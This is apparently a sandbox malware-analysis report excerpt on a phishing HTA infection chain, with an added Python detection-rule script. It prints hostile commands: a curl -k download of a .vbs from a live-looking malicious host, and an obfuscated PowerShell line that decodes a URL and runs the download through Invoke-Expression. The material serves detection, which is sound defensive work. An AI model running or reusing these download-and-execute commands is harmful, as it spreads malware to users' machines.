Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
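The process rows above describe a single chain, and every hop is a parent/child condition a detection rule can key on: mshta.exe runs cmd.exe with `curl -k -o` (`-k` disables certificate validation) to drop a .vbs into C:\Users\Public, starts it with `cmd /V/D/c start`, the VBS host writes a .js into %TEMP% and relaunches wscript.exe with the `//E:jscript` engine override, and that instance starts `conhost --headless powershell ...`, which hides the console window. The block below is an added example written for this page, not part of the report and not a vendor rule set: it encodes those conditions as Sigma-style predicates and runs them over a constructed event list built from the command lines listed above (the PowerShell line is abbreviated; the full text is in the report) plus one hypothetical WmiPrvSE.exe event and two benign controls. The WmiPrvSE rule is there because the report also records six Win32_Process::Create calls from wscript.exe: a process created through WMI is parented by WmiPrvSE.exe rather than by the script host, so rules anchored only on wscript.exe as the parent miss that hop.

```python
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event: parent image, child image, child command line."""
    parent: str
    image: str
    cmdline: str


def _name(path: str) -> str:
    """Lower-cased file name of an image path (drive and directories stripped)."""
    return path.rsplit("\\", 1)[-1].lower()


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
LOLBIN_CHILDREN = SCRIPT_HOSTS | {"cmd.exe", "powershell.exe"}

# Rule name -> predicate over a ProcEvent. Each rule encodes one hop of the chain.
RULES = {
    "mshta_cmd_curl_insecure_download": lambda e: (
        _name(e.parent) == "mshta.exe" and _name(e.image) == "cmd.exe"
        and re.search(r"\bcurl\b.*\s-k(\s|$)", e.cmdline, re.I) is not None),
    "cmd_wscript_script_in_users_public": lambda e: (
        _name(e.parent) == "cmd.exe" and _name(e.image) == "wscript.exe"
        and re.search(r"\\users\\public\\", e.cmdline, re.I) is not None),
    "wscript_engine_override_from_temp": lambda e: (
        _name(e.image) == "wscript.exe" and "//e:jscript" in e.cmdline.lower()
        and re.search(r"\\appdata\\local\\temp\\", e.cmdline, re.I) is not None),
    "script_host_spawns_headless_conhost_powershell": lambda e: (
        _name(e.parent) in SCRIPT_HOSTS and _name(e.image) == "conhost.exe"
        and re.search(r"--headless\s+powershell", e.cmdline, re.I) is not None),
    "powershell_alias_plus_char_arithmetic": lambda e: (
        _name(e.image) == "powershell.exe"
        and re.search(r"new-alias", e.cmdline, re.I) is not None
        and re.search(r"\[char\]\(", e.cmdline, re.I) is not None),
    # Hypothetical hop: WMI Win32_Process.Create children are parented by WmiPrvSE.exe.
    "wmiprvse_parents_script_host_or_shell": lambda e: (
        _name(e.parent) == "wmiprvse.exe" and _name(e.image) in LOLBIN_CHILDREN),
}


def evaluate(events):
    """Return (rule, child image name, command line) for every rule each event matches."""
    return [(rule, _name(e.image), e.cmdline)
            for e in events for rule, pred in RULES.items() if pred(e)]


def summarize(events):
    """Rule -> number of matching events, for quick triage."""
    return dict(Counter(rule for rule, _, _ in evaluate(events)))


# Constructed from the report's "Process created" rows (one row per hop).
EVENTS = [
    ProcEvent(r"unknown", r"C:\Windows\SysWOW64\mshta.exe",
              r'mshta.exe "C:\Users\user\Desktop\PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta"'),
    ProcEvent(r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\curl.exe",
              r'curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs'),
    ProcEvent(r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs"'),
    ProcEvent(r"C:\Windows\SysWOW64\wscript.exe", r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js'),
    # PowerShell command line abbreviated here; the full text is in the report rows above.
    ProcEvent(r"C:\Windows\SysWOW64\wscript.exe", r"C:\Windows\System32\conhost.exe",
              r"conhost --headless powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;..."),
    ProcEvent(r"C:\Windows\System32\conhost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130);"
              r"foreach($v in $bxcsrwklu){$s=$s+[char]($v-9019)};.$([char](9992-9887)+'e'+'x')(printout -useb $s)"),
    # Hypothetical event (not in the report): the same .vbs started via WMI Win32_Process.Create.
    ProcEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c start C:\Users\Public\676198543e2f3.vbs'),
]

# Constructed benign controls: same binaries, none of the suspicious conditions.
BENIGN_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\ProgramData\Vendor\inventory.vbs"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -NoProfile -File C:\Scripts\backup.ps1"),
]

if __name__ == "__main__":
    for rule, image, cmdline in evaluate(EVENTS):
        print(f"{rule:48} {image:16} {cmdline[:70]}")
    print(summarize(BENIGN_EVENTS))
```

Each rule fires exactly once on the constructed chain and not at all on the controls. In production the `//E:jscript` and C:\Users\Public conditions are the ones most worth keeping broad: both are rare in legitimate administration and survive renaming of the dropped files.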
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: jscript.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: jscript.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
